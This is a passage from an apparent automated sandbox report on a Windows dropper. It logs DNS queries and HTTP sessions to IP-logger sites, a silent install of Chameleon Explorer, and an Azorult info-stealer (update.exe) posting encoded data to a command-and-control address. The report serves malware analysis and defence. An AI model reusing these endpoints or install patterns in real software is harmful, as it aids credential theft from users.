                                                                                                                                      Feb 22, 2023 08:09:18.950881004 CET804970851.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.950927973 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.950928926 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.951622009 CET4970880192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.967210054 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.983825922 CET804970851.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.995446920 CET804970951.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:18.995544910 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:18.995724916 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:19.025602102 CET804970951.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:19.278256893 CET804970951.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:19.278280020 CET804970951.15.219.86192.168.2.3
                                                                                                                                      Feb 22, 2023 08:09:19.278422117 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:19.278491974 CET4970980192.168.2.351.15.219.86
                                                                                                                                      Feb 22, 2023 08:09:19.307511091 CET804970951.15.219.86192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 22, 2023 08:08:14.854444027 CET | 49977 | 53 | 192.168.2.3 | 8.8.8.8
Feb 22, 2023 08:08:14.872344971 CET | 53 | 49977 | 8.8.8.8 | 192.168.2.3
Feb 22, 2023 08:08:15.518769979 CET | 57840 | 53 | 192.168.2.3 | 8.8.8.8
Feb 22, 2023 08:08:15.536854982 CET | 53 | 57840 | 8.8.8.8 | 192.168.2.3
Feb 22, 2023 08:08:31.021950006 CET | 57990 | 53 | 192.168.2.3 | 8.8.8.8
Feb 22, 2023 08:08:31.065187931 CET | 53 | 57990 | 8.8.8.8 | 192.168.2.3
Feb 22, 2023 08:08:32.460294008 CET | 52387 | 53 | 192.168.2.3 | 8.8.8.8
Feb 22, 2023 08:08:32.488538027 CET | 53 | 52387 | 8.8.8.8 | 192.168.2.3
Feb 22, 2023 08:09:16.978604078 CET | 56924 | 53 | 192.168.2.3 | 8.8.8.8
Feb 22, 2023 08:09:17.009661913 CET | 53 | 56924 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 22, 2023 08:08:14.854444027 CET | 192.168.2.3 | 8.8.8.8 | 0x4f45 | Standard query (0) | 2no.co | A (IP address) | IN (0x0001) | false
Feb 22, 2023 08:08:15.518769979 CET | 192.168.2.3 | 8.8.8.8 | 0xad20 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001) | false
Feb 22, 2023 08:08:31.021950006 CET | 192.168.2.3 | 8.8.8.8 | 0xccbf | Standard query (0) | www.chameleon-managers.com | A (IP address) | IN (0x0001) | false
Feb 22, 2023 08:08:32.460294008 CET | 192.168.2.3 | 8.8.8.8 | 0x2ef2 | Standard query (0) | neosoft-activator.appspot.com | A (IP address) | IN (0x0001) | false
Feb 22, 2023 08:09:16.978604078 CET | 192.168.2.3 | 8.8.8.8 | 0x7400 | Standard query (0) | www.chameleon-managers.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 22, 2023 08:08:14.872344971 CET | 8.8.8.8 | 192.168.2.3 | 0x4f45 | No error (0) | 2no.co | | 148.251.234.93 | A (IP address) | IN (0x0001) | false
Feb 22, 2023 08:08:15.536854982 CET | 8.8.8.8 | 192.168.2.3 | 0xad20 | No error (0) | iplogger.org | | 148.251.234.83 | A (IP address) | IN (0x0001) | false
Feb 22, 2023 08:08:31.065187931 CET | 8.8.8.8 | 192.168.2.3 | 0xccbf | No error (0) | www.chameleon-managers.com | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001) | false
Feb 22, 2023 08:08:31.065187931 CET | 8.8.8.8 | 192.168.2.3 | 0xccbf | No error (0) | ghs.googlehosted.com | | 142.250.180.147 | A (IP address) | IN (0x0001) | false
Feb 22, 2023 08:08:32.488538027 CET | 8.8.8.8 | 192.168.2.3 | 0x2ef2 | No error (0) | neosoft-activator.appspot.com | | 142.250.184.84 | A (IP address) | IN (0x0001) | false
Feb 22, 2023 08:09:17.009661913 CET | 8.8.8.8 | 192.168.2.3 | 0x7400 | No error (0) | www.chameleon-managers.com | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001) | false
Feb 22, 2023 08:09:17.009661913 CET | 8.8.8.8 | 192.168.2.3 | 0x7400 | No error (0) | ghs.googlehosted.com | | 142.250.180.147 | A (IP address) | IN (0x0001) | false
                                                                                                                                      • 2no.co
                                                                                                                                      • iplogger.org
                                                                                                                                      • neosoft-activator.appspot.com
                                                                                                                                      • www.chameleon-managers.com
                                                                                                                                      • 51.15.219.86
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49701 | 148.251.234.93 | 443 | C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49702 | 148.251.234.83 | 443 | C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49705 | 142.250.184.84 | 443 | C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49704 | 142.250.180.147 | 80 | C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2023 08:08:31.106020927 CET | 227 | OUT | GET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1
                                                                                                                                      User-Agent: Chameleon Static (Ver: 3.0.0.505)
                                                                                                                                      Host: www.chameleon-managers.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
Feb 22, 2023 08:08:31.507232904 CET | 227 | IN | HTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Set-Cookie: cham_uid=c59b80ec3e93e3d2a7920d213840ce6b; expires=Thu, 22-Feb-2024 07:08:31 GMT; Path=/
                                                                                                                                      X-Cloud-Trace-Context: eec096664d7793a8ae71fd4f94e9cece;o=1
                                                                                                                                      Date: Wed, 22 Feb 2023 07:08:31 GMT
                                                                                                                                      Server: Google Frontend
                                                                                                                                      Content-Length: 32
                                                                                                                                      Expires: Wed, 22 Feb 2023 07:08:31 GMT
                                                                                                                                      Data Raw: 63 35 39 62 38 30 65 63 33 65 39 33 65 33 64 32 61 37 39 32 30 64 32 31 33 38 34 30 63 65 36 62
                                                                                                                                      Data Ascii: c59b80ec3e93e3d2a7920d213840ce6b


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49707 | 142.250.180.147 | 80 | C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2023 08:09:17.093458891 CET | 327 | OUT | GET /info/versions/ HTTP/1.1
                                                                                                                                      User-Agent: Chameleon checker ( Ver: 3.0.0.505)
                                                                                                                                      Host: www.chameleon-managers.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
Feb 22, 2023 08:09:17.252588034 CET | 327 | IN | HTTP/1.1 200 OK
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Set-Cookie: cham_uid=0d69d7bfc369811f84d08007faaec7bd; expires=Thu, 22-Feb-2024 07:09:17 GMT; Path=/
                                                                                                                                      X-Cloud-Trace-Context: b90958ac7616a13e32b2ada71c38deaa
                                                                                                                                      Date: Wed, 22 Feb 2023 07:09:17 GMT
                                                                                                                                      Server: Google Frontend
                                                                                                                                      Content-Length: 470
                                                                                                                                      Expires: Wed, 22 Feb 2023 07:09:17 GMT
                                                                                                                                      Data Ascii: <?$startup_full_ver_dadagoo="3.2.0.712";$startup_full_ver="4.0.0.914";$startup_beta_ver="4.0.0.914";$window_full_ver="2.2.0.428";$window_beta_ver="2.2.0.428";$task_full_ver="4.0.0.782";$task_beta_ver="4.0.0.782";$explorer_full_ver="3.0.0.500";$explorer_beta_ver="3.0.0.500";$volume_full_ver="1.0.0.132";$volume_beta_ver="1.0.0.132";$shutdown_full_ver="1.2.2.40";$shutdown_beta_ver="1.2.2.40";$folder_full_ver="2.0.10.400";$folder_beta_ver="2.0.10.400";?>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49708 | 51.15.219.86 | 80 | C:\Users\user\AppData\Roaming\update.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2023 08:09:18.626941919 CET | 328 | OUT | POST /1/index.php HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                                                      Host: 51.15.219.86
                                                                                                                                      Content-Length: 109
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 3f 2f fb 3e 2f fb 3c 2f fb 3f 2f fb 34 4e 8b 28 38 8c 28 39 ff 28 39 ff 28 39 f8 28 39 fa 28 39 fe 28 39 fd 28 39 f9 4c 2f fb 34
                                                                                                                                      Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/?/>/</?/4N(8(9(9(9(9(9(9(9L/4
Feb 22, 2023 08:09:18.950828075 CET | 328 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.4.5
                                                                                                                                      Date: Wed, 22 Feb 2023 07:09:18 GMT
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49709 | 51.15.219.86 | 80 | C:\Users\user\AppData\Roaming\update.exe
Timestamp | kBytes transferred | Direction | Data
Feb 22, 2023 08:09:18.995724916 CET | 329 | OUT | POST /1/index.php HTTP/1.0
                                                                                                                                      Host: 51.15.219.86
                                                                                                                                      Connection: close
                                                                                                                                      User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                                                      Content-Length: 109
                                                                                                                                      Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 3f 2f fb 3e 2f fb 3c 2f fb 3f 2f fb 34 4e 8b 28 38 8c 28 39 ff 28 39 ff 28 39 f8 28 39 fa 28 39 fe 28 39 fd 28 39 f9 4c 2f fb 34
                                                                                                                                      Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/?/>/</?/4N(8(9(9(9(9(9(9(9L/4
Feb 22, 2023 08:09:19.278256893 CET | 329 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.4.5
                                                                                                                                      Date: Wed, 22 Feb 2023 07:09:19 GMT
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                      0 | 192.168.2.3 | 49701 | 148.251.234.93 | 443 | C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                                                      2023-02-22 07:08:15 UTC | 0 | OUT | GET /1dHC37 HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                      Host: 2no.co
                                                                                                                                      2023-02-22 07:08:15 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 22 Feb 2023 07:08:15 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: clhf03028ja=84.17.52.8; expires=Thu, 22-Feb-2024 07:08:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                      Location: https://iplogger.org/unknown/2no.co/1dHC37/unknown
                                                                                                                                      Expires: Wed, 22 Feb 2023 07:08:15 +0000
                                                                                                                                      Strict-Transport-Security: max-age=604800
                                                                                                                                      Content-Security-Policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      2023-02-22 07:08:15 UTC | 0 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                      1 | 192.168.2.3 | 49702 | 148.251.234.83 | 443 | C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                                                      2023-02-22 07:08:15 UTC | 0 | OUT | GET /unknown/2no.co/1dHC37/unknown HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                      Host: iplogger.org
                                                                                                                                      2023-02-22 07:08:15 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 22 Feb 2023 07:08:15 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval' data: blob:; report-uri https://iplogger.org/csp.php;
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                      Last-Modified: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                      Cache-Control: max-age=3, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      Set-Cookie: cursor=CXYw25B9h6R9R490w7b7b6s1jKFUCQdX; path=/; domain=.iplogger.org; secure; HttpOnly; SameSite=Lax
                                                                                                                                      Set-Cookie: turnback=info%2Funknown%2F1dHC37%2F; path=/; domain=.iplogger.org; secure; HttpOnly; SameSite=Lax
                                                                                                                                      engine-initialized: 0.0071599483489990234
                                                                                                                                      engine-ended: 0.007217884063720703
                                                                                                                                      engine-errors: 0
                                                                                                                                      engine-finished: 0.007328987121582031
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      2023-02-22 07:08:15 UTC | 1 | IN | Data Raw: 35 62 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 c2 a9 20
                                                                                                                                      Data Ascii: 5bdf<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="author" content=""><meta name="copyright" content="Copyright
                                                                                                                                      2023-02-22 07:08:15 UTC | 16 | IN | Data Raw: 3e 50 6c 65 61 73 65 20 72 65 61 64 20 6f 75 72 20 75 70 64 61 74 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 72 75 6c 65 73 2f 22 3e 20 54 65 72 6d 73 20 61 6e 64 20 43 6f 6e 64 69 74 69 6f 6e 73 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 70 72 69 76 61 63 79 2f 22 3e 20 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 20 76 65 72 79 20 63 61 72 65 66 75 6c 6c 79 20 61 6e 64 20 64 6f 20 6e 6f 74 20 61 63 63 65 70 74 20 74 68 65 6d 20 69 66 20 79 6f 75 20 68 61 76 65 20 61 6e 79 20 64 6f 75 62 74 73 2e 3c 2f 70 3e 3c 70 3e 3c 62 72
                                                                                                                                      Data Ascii: >Please read our update <a target="_blank" href="https://iplogger.org/rules/"> Terms and Conditions</a> and <a target="_blank" href="https://iplogger.org/privacy/"> Privacy Policy</a> very carefully and do not accept them if you have any doubts.</p><p><br


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                      2 | 192.168.2.3 | 49705 | 142.250.184.84 | 443 | C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                                                      2023-02-22 07:08:32 UTC | 24 | OUT | GET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-7E632307063B35A85D7B937531F0F205-DA23DD2618B7306B8B24495E8B2916C0&vrs=3.0.0.505&prg=explorer&uid=c59b80ec3e93e3d2a7920d213840ce6b HTTP/1.1
                                                                                                                                      User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505)
                                                                                                                                      Host: neosoft-activator.appspot.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2023-02-22 07:08:35 UTC | 25 | IN | HTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Type: text/plain;charset=utf-8
                                                                                                                                      X-Cloud-Trace-Context: dcdf721bd21fed5b98e6d1d8ba2ffc49
                                                                                                                                      Date: Wed, 22 Feb 2023 07:08:35 GMT
                                                                                                                                      Server: Google Frontend
                                                                                                                                      Content-Length: 500
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                      Connection: close
                                                                                                                                      2023-02-22 07:08:35 UTC | 25 | IN | Data Raw: 41 63 74 69 76 61 74 69 6f 6e 20 72 65 73 75 6c 74 0d 0a 56 61 6c 69 64 0d 0a 75 79 69 4a 4c 58 6b 69 44 70 2b 56 4b 48 36 34 4a 41 62 78 58 72 76 31 78 6e 4f 6b 4a 76 4d 54 39 45 67 71 41 78 65 34 6c 38 45 78 33 67 55 63 55 54 57 30 47 4c 45 4c 6f 56 45 67 6e 35 5a 77 58 71 7a 54 54 76 61 34 30 51 65 6c 56 77 4a 6e 33 66 6a 45 4d 4c 43 38 76 4a 61 56 44 38 42 50 4d 58 52 45 51 76 51 4f 51 6f 67 53 75 37 59 75 35 54 4f 4e 47 67 64 47 69 44 61 68 69 31 37 35 0d 0a 43 4f 67 74 2b 4b 39 51 74 54 2f 2f 4c 30 43 54 43 48 47 66 31 32 46 6d 6d 69 42 33 4c 39 7a 43 74 71 76 41 48 50 68 57 48 4b 55 30 64 44 53 64 47 6f 56 57 73 48 64 44 6f 56 70 77 57 39 4b 30 78 71 46 64 52 67 4d 6f 49 43 55 57 45 47 5a 58 65 31 34 4a 6b 47 56 46 5a 2b 74 37 58 69 42 78 5a 2f 31
                                                                                                                                      Data Ascii: Activation resultValiduyiJLXkiDp+VKH64JAbxXrv1xnOkJvMT9EgqAxe4l8Ex3gUcUTW0GLELoVEgn5ZwXqzTTva40QelVwJn3fjEMLC8vJaVD8BPMXREQvQOQogSu7Yu5TONGgdGiDahi175COgt+K9QtT//L0CTCHGf12FmmiB3L9zCtqvAHPhWHKU0dDSdGoVWsHdDoVpwW9K0xqFdRgMoICUWEGZXe14JkGVFZ+t7XiBxZ/1


                                                                                                                                      Target ID:0
                                                                                                                                      Start time:08:08:00
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      Imagebase:0xdf0000
                                                                                                                                      File size:8148480 bytes
                                                                                                                                      MD5 hash:894FCE964D09231B2B271FBF5AFD4806
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:08:08:11
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\cexplorer.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:6860752 bytes
                                                                                                                                      MD5 hash:B2E5A8FE3CA4F0CD681B5662F972EA5F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 2%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:08:08:12
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:1185824 bytes
                                                                                                                                      MD5 hash:729BC0108BCD7EC083DFA83D7A4577F2
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:08:08:13
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\update.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\update.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:602376 bytes
                                                                                                                                      MD5 hash:CF1EDC23E7EB941A4231A322C08C22B4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Visual Basic
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 80%, ReversingLabs
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:08:08:20
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:08:08:39
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:08:08:41
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:08:08:45
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:4644456 bytes
                                                                                                                                      MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:08:08:47
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:15091304 bytes
                                                                                                                                      MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:08:08:49
                                                                                                                                      Start date:22/02/2023
                                                                                                                                      Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
